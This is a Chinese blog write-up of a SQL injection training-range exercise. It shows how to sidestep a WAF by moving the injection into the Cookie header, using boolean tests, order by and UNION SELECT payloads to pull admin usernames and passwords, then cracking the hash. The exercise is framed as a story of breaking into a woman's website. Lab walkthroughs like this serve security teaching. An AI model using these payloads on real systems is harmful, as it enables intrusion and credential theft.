zoukankan      html  css  js  c++  java
  • 封神台靶场:第二章:遇到阻难!绕过WAF过滤!【配套课时:SQL注入攻击原理 实战演练】

    尤里在得到女神家网站密码后,却发现注入点权限很小,凭他的皮毛技术也没找到网站后台,

    这是尤里通过旁站查询,他发现了女神家网站是用的主机空间托管,
    他立刻扫描旁站,果然发现一个站点,且后台是默认路径……
    尤里冷笑一声行动了起来,这时有一层防火墙拦在了他的面前。。

    靶场地址

    https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb
    请求方式    GET
    闭合方式    
    注入方式    Cookie
    注入代码

    测试

    ?id=169    正常访问
    ?id=171    正常访问
    可以看出id值是跟数据库有交互的。
    ?id=169'    页面限制---WAF

    经过研究发现,cookie可能存在注入点

    插件是火狐的ModHeader插件,通过插件扩展搜索直接安装,这里就不分享了。

    输入id=171',发现有报错,这里存在报错注入。

     由于Cookie是放在HTTP中通过URL进行传输的,空格的URL编码

    id=171+and+1=1    页面正常 
    id=171+and+1=2    页面报错

    跟第一章一样,采用order by确定字段数量

    order by 10页面显示正常(记得把空格换成+)

    id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

    id=12345+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

     使用https://cmd5.com/帮助解密

      密码为  welcome

  • 相关阅读:
    iOS的图片:解码(CPU)与内存(缓存)
    iOS离屏渲染的解释:渲染与cpu、gpu
    渲染、render与绘制
    算法沉思:算法的构成
    待阅备份
    iOS进阶之页面性能优化
    iOS--性能优化--保持界面流畅
    iOS开发中的Markdown渲染
    OS开发小记:iOS富文本框架DTCoreText在UITableView上的使用
    iOS UI的几种模式
  • 原文地址:https://www.cnblogs.com/Xshun-z/p/13974562.html
Copyright © 2011-2022 走看看